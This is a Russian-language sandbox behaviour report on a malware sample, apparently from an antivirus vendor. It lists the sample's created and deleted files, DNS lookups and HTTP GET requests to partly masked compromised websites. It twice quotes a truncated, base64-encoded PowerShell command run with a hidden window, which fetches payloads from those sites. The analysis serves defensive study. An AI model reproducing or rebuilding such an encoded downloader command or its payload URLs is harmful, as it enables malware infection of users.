Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAGkAYwB4AGMAeAA5AD0AKAAoACcARwA3ACcAKwAnAHkAJwApACsAKAAnADAAJwArACcAZgB2ADIAJwApACkAOwAkAE4AdQBvAGUAMABiADQAPQAkAEUAagA4ADYAdQBhAG0AIAArACAAWwBjAGgAYQByAF0AKAAxACAAKw...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\wt2ixtj\hp6mkgi\ay8g9b.exe
Удаляет следующие файлы
- %HOMEPATH%\wt2ixtj\hp6mkgi\ay8g9b.exe
Сетевая активность
Подключается к
- 'li###usbbl.com':443
TCP
Запросы HTTP GET
- http://wi###dcare.org/wp-includes/Ri/
- http://gy###arbar.com/EDU/wBubLrB/
- http://gi######sychicstudio.com/cgi-bin/AAHr/
- http://se####fastdeal.com/
- http://be######terfilterplus.com/wp-admin/A/
- http://my######egalservices.com/wp-admin/87M/
- http://be####nsafety.com/wp-admin/u23zKk2/
UDP
- DNS ASK wi###dcare.org
- DNS ASK gy###arbar.com
- DNS ASK gi######sychicstudio.com
- DNS ASK se####fastdeal.com
- DNS ASK be######terfilterplus.com
- DNS ASK my######egalservices.com
- DNS ASK be####nsafety.com
- DNS ASK ma###nanews.com
- DNS ASK li###usbbl.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAGkAYwB4AGMAeAA5AD0AKAAoACcARwA3ACcAKwAnAHkAJwApACsAKAAnADAAJwArACcAZgB2ADIAJwApACkAOwAkAE4AdQBvAGUAMABiADQAPQAkAEUAagA4ADYAdQBhAG0AIAArACAAWwBjAGgAYQByAF0AKAAxACAAKw...' (со скрытым окном)
